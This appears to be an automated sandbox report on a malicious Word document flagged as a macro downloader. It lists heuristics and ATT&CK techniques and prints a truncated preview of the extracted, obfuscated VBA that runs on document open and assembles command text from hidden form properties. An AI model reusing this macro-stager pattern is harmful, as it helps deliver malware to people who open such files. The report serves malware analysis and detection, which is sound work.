MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of a downloader. The obfuscated VBA code and the use of CreateObject and GetObject heuristics suggest the execution of a malicious payload. The ClamAV detection further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Downloader.Sagent-7459479-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-7459479-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7873 bytes |
SHA-256: 58085ffc8dda8658cf2976dae71911dfbac4ca186479b529254b09e24e03575f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wlohmbxf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nsboizdpzuiyq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Errfilzinaklg, Lwhnnpkev
For Lnikmigtx = Pwgpawccpm To Zlwcfitnw
Zlacncem = Agkgxonbtvuu
Zqfbldaput = Hex(Atpzkzyp)
Lwhtglczi = Chr(Qdxxdaprl)
Ytntmuluwqk = Jurwomvlc - Qsbhyixntu
Gnzionjpfjs = Jscyqfwvdc
Ewnsxblmgljp = Hex(Xtiehanxp)
Ocoarckfqkrv = Int(Hhbcxjnuj)
Next
Dim Vgcvdnhgr, Skttvegl
For Bekzffuefogg = Emwoaxjxhesoh To Wgkkmtcs
Inbmotlrwpjis = Mexghqxve
Wwfdctaqs = Hex(Lskgwlkrn)
Capelohkrxdgx = Chr(Tmpicsxete)
Tmlmvtwu = Xhljhskimmr - Xbfmgevvapnn
Kinavgeph = Lfuksjjiunkp
Pjsxsywjlza = Hex(Wenhujtvzb)
Gdedszsgk = Int(Mrpywbtuktxnd)
Next
Dim Chrzelxnnse, Xrbpfoyczynlv
For Aivdkcjnz = Pimplmuit To Xveylcjdoiiqn
Bfuodbnyyppkm = Nkdblzzmrge
Xhszkplonf = Hex(Jwfjwswcxvxml)
Btdhzfabrwpzx = Chr(Zfddbctc)
Itpcjgnrsju = Brivnmgsymuvs - Rtiqhsrml
Qchfghohb = Hgqpvjgugrwf
Becfkexwfwelt = Hex(Gkhvymcaswi)
Srtwhhfdmcr = Int(Katkkpahzgpk)
Next
Llyitqjc
End Sub
Attribute VB_Name = "Easpwgcbwkfj"
Attribute VB_Base = "0{44E853AD-C495-4EDA-A1F7-CAABD72FB8C8}{E0F90029-5277-45CC-9E55-529C6D30D26B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xzzkpmgfgfh"
Function Qxqzlskyh()
Dim Flnmephmida, Rpvipiing
For Kzsipifxru = Yrvfqelhrr To Zzgbvwbzya
Wzwaxdfle = Rudsjufvtegip
Bvsnnxpq = Hex(Hkjoljhwcog)
Setfiaqq = Chr(Tbksqpzcdubbk)
Hvymnnxir = Usgqrazmqn - Rhcmdybquxy
Setlwstsh = Vncbcxftg
Elaukpjpx = Hex(Kzwgatuhy)
Uqpvaowreta = Int(Ikcidjrwnqccf)
Next
Jxcafeormlc = Wlohmbxf.Nsboizdpzuiyq
Dim Tbiwtelusjrac, Hqewtoenpn
For Vrqbvdslyb = Sigbsspnseyyo To Lpntirrqdbhvx
Lfdfekidvwxou = Smaghvkiehas
Kwsduttujqncm = Hex(Kcxakjvvrccax)
Esfdkafkzxzxd = Chr(Ejrltfcssqpa)
Ssvvlmux = Weryckmrm - Sjlfsbamnuzej
Ebrwygajp = Ephdxoddzjj
Kukvnwahrygk = Hex(Arszvqexkfj)
Bggvukxmdv = Int(Sogmrasxzclhj)
Next
Tmiypvnrxz = Jxcafeormlc + Easpwgcbwkfj.Ypjhiucujt + Easpwgcbwkfj.Jrbmjczvhlzqa + Easpwgcbwkfj.Rvbofqebud
Dim Mskfqyfosfgfv, Ycpxqfpzqyi
For Tckykolzqlkwk = Aekkcgebp To Qwtugiuhv
Hugbqirfbguh = Nxbspbubfy
Webcdqrfw = Hex(Apvjjvzw)
Itksogoagpim = Chr(Ndydeqtpxt)
Tskffbak = Rjojceqzvo - Vfxvsybtvq
Nwqakgmayc = Punoyxymyjw
Jjbjuoarbw = Hex(Ppoceltthgx)
Uysfodalra = Int(Qdnmxnxhai)
Next
Nfpcgefp = Tmiypvnrxz + Easpwgcbwkfj.Shbuwtgaarlzq + Easpwgcbwkfj.Qxvpaqknzamz
Dim Hchtgvtdha, Vcobypcoqzuz
For Jiqyfvgsuudym = Lqetqqjwma To Evhihghmknj
Nchtxacf = Jpgwizmdx
Cwmmvsekb = Hex(Iqdocdoai)
Qysbkzmy = Chr(Bukfvhbhyu)
Cgpsuxiox = Agouuifycpuhw - Gwnsjnzkv
Reopupovjz = Hzswyqizsz
Mbeclavsiir = Hex(Mvftbiizjf)
Raunmtrsxds = Int(Jieoezismm)
Next
Qxqzlskyh = Ynmrjwhfd + Nfpcgefp + Ynmrjwhfd
Dim Mfcgcjrab, Ocyborwj
For Smntxaxcbuwy = Wrjkqafjatrzs To Fytvnutpnei
Zleqvzewhmsrn = Tbyhxovvcc
Dcwghhhj = Hex(Besusxmbezl)
Mfbvjdqcnbwbt = Chr(Ljgzyezup)
Yibxurwgjagmy = Modwtylhputmi - Lmsnfibqgef
Efxiuasl = Kymaldbfnpwp
Kzplywrnkjdk = Hex(Rizcttipth)
Fysyfokdxu = Int(Muawncxbg)
Next
End Function
Function Llyitqjc()
Dim Inwlkbrbmtnu, Gwbshyhbxa
For Whnllphoprax = Yvvkpndulzoi To Mgqvlrekob
Nqvowecoz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.